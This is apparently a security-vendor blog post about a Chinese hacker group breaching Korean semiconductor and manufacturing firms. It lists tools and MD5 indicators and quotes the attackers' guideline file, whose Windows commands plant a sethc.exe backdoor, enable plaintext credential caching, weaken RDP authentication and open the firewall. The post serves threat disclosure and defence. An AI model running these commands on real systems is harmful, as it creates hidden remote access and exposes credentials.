Chinese Hacker Group Stealing Information From Korean Companies

Recently, there have been frequent cases of attacks targeting vulnerable servers that are accessible externally, such as SQL servers or IIS web servers.

The team has confirmed two affected companies in this case. One being a company for semiconductors, and the other being a smart manufacturing company which utilizes artificial intelligence. It is assumed that the threat group that carried out the hacking attack is a Chinese hacker group like Xiaoqiying and Dalbit, as a Chinese text file containing instructions on how to use the hacking tool was found.

Chinese Hacker Group’s Guideline

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f reg add “HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe” /v “Debugger” /t REG_SZ /d “\”c:\windows\system32\cmd.exe\” /z” /f REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v UserAuthentication /t REG_DWORD /d 0 /f REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v SecurityLayer /t REG_DWORD /d 0 /f ！！ 禁止强制名，以管理的身行cmd 行以下命令 Win2012 Can: bcdedit.exe /set nointegritychecks on \Easy File Locker （！！！注意：只需要予Access限，其他都不需要，切切） 除1. REG delete “HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Easy file Locker” /f 除2：安目 除3： C:\Users\master\AppData\Roaming\Microsoft\Windows\Start Menu\Programs （快捷方式） C:/Users/Public/Documents/EFL/rule.ini 藏的定在此 Easy File Locker添加需要藏的文件，只予access限，可文件的藏。 cmd.exe /c reg add “HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /t REG_DWORD /v portnumber /d 3389 /f cmd.exe /c wmic RDTOGGLE WHERE ServerName=’%COMPUTERNAME%’ call SetAllowTSConnections 1 cmd.exe /c netsh advfirewall firewall add rule name=”RemoteDesktop_Allow” dir=in protocol=TCP action=allow localport=3389 remoteip=any 1.reg add “HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /t REG_DWORD /v portnumber /d 3389 /f \配置端口3389 2.wmic RDTOGGLE WHERE ServerName=’%COMPUTERNAME%’ call SetAllowTSConnections 1 （open terminal, 0 close) netsh advfirewall firewall add rule name=”RemoteDesktop_Allow” dir=in protocol=TCP action=allow localport=3389 remoteip=any 4.netsh advfirewall firewall show rule name=”RemoteDesktop_Allow” 5. netsh advfirewall firewall del rule name=”RemoteDesktop_Allow” reg add “HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe” /v “Debugger” /t REG_SZ /d “\”c:\windows\system32\cmd.exe\” /z” /f REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v UserAuthentication /t REG_DWORD /d 0 /f REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v SecurityLayer /t REG_DWORD /d 0 /f

Table 1. Text file containing the guideline for the hacking tool used by the hacker group

Threat Actor’s Server and Exfiltrated Information

The servers confirmed to be used by the threat actor are as follows:

FRP Management Server

The threat actor installed an FRP on the servers of the affected companies. Therefore, on the page shown in Figure 1, it is possible to confirm the information of the infected PCs that have FRP installed and the proxy servers used by the threat actor.

Previous blog posts, including one on the ‘Dalbit’ APT group, as well as the AhnLab TIP service’s ‘Analysis Report on Attack Cases Exploiting Various Remote Control Tools‘, have provided detailed coverage of attack methods that utilize FRP.

File Server

This server contains hacking tools such as CobaltStrike, VPN, remote control, etc., as well as many log files. As shown in Figure 2, these log files are located inside a directory named with numbers. The stolen logs contain credential and network information alongside information that is assumed to be inside material from companies.

Threat Actor Tools & IOC

The tools used by the threat actor and the tools found on their server are as follows:

WebShell

Behinder
f8de2e99dc7523d2c83d1a48e844c5ff
77d507d30a155cf315f839db3bf507f7

Aspxspy
dd634ebfba56c1a898c4156ffdea146d

Godzilla
ed6ef17783c667c0c894e6cf7c71c54a
e5b626c4b172065005d04205b026e446

IceSword
a0301c680b257516090e336ca4e29167

Credential Access

Mimikatz
825e6e194a9d5e12cbf109b7de07a244
6c9ad4e67032301a61a9897377d9cff8
bb8bdb3e8c92e97e2f63626bc3b254c4
29efd64dd3c7fe1e2b022b7ad73a1ba5

Impacket (Secretsdump)
a7b705e4fb473e7ce32a495b079017b2

Network Scanning

SharpHound
12c70eefa2edba8b420a6d00891c792b
c541c44f41d953899d5734dd1d3b1d78

PortScan
41b61b87cf54821a45e8cf2cbfc852f8

FScan
32421a007f28aacf869a46f714945ad0

Persistence

NSSM
beceae2fdc4f7729a93e94ac2ccd78cc

Lateral Movement

PSexec
421116e8b522898f9d8e1651a8315705

Impacket (WMIExec)
e663e4b83089087d0a7989365b3513c4

RemCom
6983f7001de10f4d19fc2d794c3eb534

Proxy and VPN Tool

FRPC
7d9c233b8c9e3f0ea290d2b84593c842
2eead3e509a19002d80f48d431922f1e

FRPC INI (Configuration file)
61616e8948de1bf2b62a34854d655dea
e5273f435c8eab59bc5dbaa5ac11da7b

VPN Gate
e74130971e6f3c3caf56d862a39e750f

PulseSecure
8f9da1466cb5415a45a512341549b12e

Remote Access Tool

CobaltStrike
5e4fdc376f7dda3744bc331352bbe231
968931d2608f997866e07ce777b41636
2ad284b957ab28277fef534b3698c006

Ladon
006e7290fbae946551f07f6e0319d5de
b3b2c45aef41d94e7491d049d33c56c0

DameWare NT (Remote Control)
b10040dcd1583dadc4bf357eec22a18f

TeamViewer
b71d75f8f79e86add3fdece2c871e34c

ToDesk
7031441687a9548f1a7a08eb1e56f66b

ETC

note.txt (Original guideline file in Chinese)
a0ac0624926bfbbf196050783dfbc019

The threat actor’s C2 server is still accessible and partial pieces of information from the affected companies are currently exposed. Therefore, they will not be disclosed here in order to prevent additional harm.

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

The post Chinese Hacker Group Stealing Information From Korean Companies appeared first on ASEC BLOG.

Article Link: Chinese Hacker Group Stealing Information From Korean Companies - ASEC BLOG